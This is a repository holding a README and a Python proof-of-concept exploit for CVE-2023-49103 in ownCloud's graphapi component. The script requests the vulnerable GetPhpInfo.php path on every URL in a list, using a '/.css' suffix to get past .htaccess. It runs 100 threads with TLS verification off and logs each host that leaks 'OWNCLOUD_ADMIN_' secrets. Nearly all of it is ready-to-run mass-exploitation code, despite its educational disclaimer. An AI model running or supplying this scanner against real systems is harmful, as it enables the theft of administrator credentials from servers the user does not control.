├── README.md └── exploit.py /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-49103 2 | PoC for the CVE-2023-49103 3 | 4 | ## Overview 5 | This Python script is designed to efficiently process a large list of URLs to check for the presence of `phpinfo()` output. It uses multi-threading to handle a large number of URLs concurrently, significantly speeding up the process. The script also features a real-time progress bar to visually track the progress. 6 | 7 | To trigger the vulnerability, access to the phpinfo() URL isn't enough: you also need to bypass .htaccess (thanks rapid7 for the insight). In this case, this is done by adding /.css to the URL. 8 | 9 | ## Requirements 10 | - Python 3.x 11 | - `requests` 12 | - `urllib3` 13 | - `colorama` 14 | - `alive-progress` 15 | - `concurrent.futures` (part of the standard library in Python 3) 16 | 17 | ## Installation 18 | 1. Ensure you have Python 3 installed on your system. 19 | 2. Clone this repository or download the script. 20 | 3. Install the required Python packages: 21 | 22 | `pip install requests urllib3 colorama alive-progress` 23 | 24 | ## Usage 25 | To use the script, you need a text file containing a list of URLs to check. Each URL should be on a new line. 26 | 27 | ## Prepare your URL list 28 | 29 | Create a text file (e.g., urls.txt) with each URL on a new line. 30 | 31 | ## Run the script 32 | 33 | Use the script with the following command, replacing input_file.txt with your file of URLs and output_file.txt with the desired output file name: 34 | 35 | `python exploit.py -t input_file.txt -o output_file.txt` 36 | 37 | ## View Results 38 | 39 | The script will process each URL and output the results to the specified output file. URLs with valid phpinfo() output are logged in this file. 40 | 41 | ## Contributions 42 | Feel free to fork this repository or submit pull requests with improvements. 43 | 44 | Thanks @random-robbie for the PR <3 45 | 46 | ## Disclaimer 47 | 48 | I originally wrote this script just for fun (I was bored and wanted to try my hand at multithreading) and not for any malicious purposes. Do the same, test on YOUR own instances and not on the neighbor's instance. 49 | This script is ONLY for educational purposes, of course. 50 | -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib3 3 | from concurrent.futures import ThreadPoolExecutor 4 | from colorama import Fore, Style 5 | import argparse 6 | import queue 7 | from alive_progress import alive_bar 8 | 9 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 10 | 11 | def check_phpinfo(url): 12 | try: 13 | response = requests.get(url, verify=False) # Bypass SSL verification 14 | if response.status_code == 200 and 'OWNCLOUD_ADMIN_' in response.text: 15 | return True 16 | except requests.RequestException: 17 | pass 18 | return False 19 | 20 | def process_urls(url_queue, output_file, update_bar): 21 | with open(output_file, 'a') as out: 22 | while True: 23 | url = url_queue.get() 24 | if url is None: 25 | url_queue.task_done() 26 | break # Sentinel value to indicate completion 27 | try: 28 | if check_phpinfo(url): 29 | print(Fore.GREEN + "Valid: " + url + Style.RESET_ALL) 30 | out.write(url + '\n') 31 | else: 32 | print(Fore.RED + "Invalid: " + url + Style.RESET_ALL) 33 | except Exception as e: 34 | print(Fore.YELLOW + f"Error processing {url}: {e}" + Style.RESET_ALL) 35 | finally: 36 | url_queue.task_done() 37 | update_bar() # Update the progress bar 38 | 39 | def process_file(file_path, output_file): 40 | urls = [] 41 | with open(file_path, 'r') as file: 42 | for line in file: 43 | base_url = line.strip() 44 | # Append both URL variants for each base URL 45 | urls.append(base_url + "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css") 46 | urls.append(base_url + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css") 47 | 48 | url_queue = queue.Queue() 49 | num_workers = min(100, len(urls)) # Adjust based on your system's capabilities 50 | 51 | with alive_bar(len(urls), bar='smooth', enrich_print=False) as bar: 52 | with ThreadPoolExecutor(max_workers=num_workers) as executor: 53 | # Start worker threads 54 | for _ in range(num_workers): 55 | executor.submit(process_urls, url_queue, output_file, bar) 56 | 57 | # Read URLs and add them to the queue 58 | for url in urls: 59 | url_queue.put(url) 60 | 61 | # Add sentinel values to indicate completion 62 | for _ in range(num_workers): 63 | url_queue.put(None) 64 | 65 | url_queue.join() # Wait for all tasks to be completed 66 | 67 | 68 | if __name__ == "__main__": 69 | parser = argparse.ArgumentParser(description='Process some URLs.') 70 | parser.add_argument('-t', '--target', required=True, help='Input file with URLs') 71 | parser.add_argument('-o', '--output', required=True, help='Output file for valid URLs') 72 | 73 | args = parser.parse_args() 74 | 75 | process_file(args.target, args.output) 76 | --------------------------------------------------------------------------------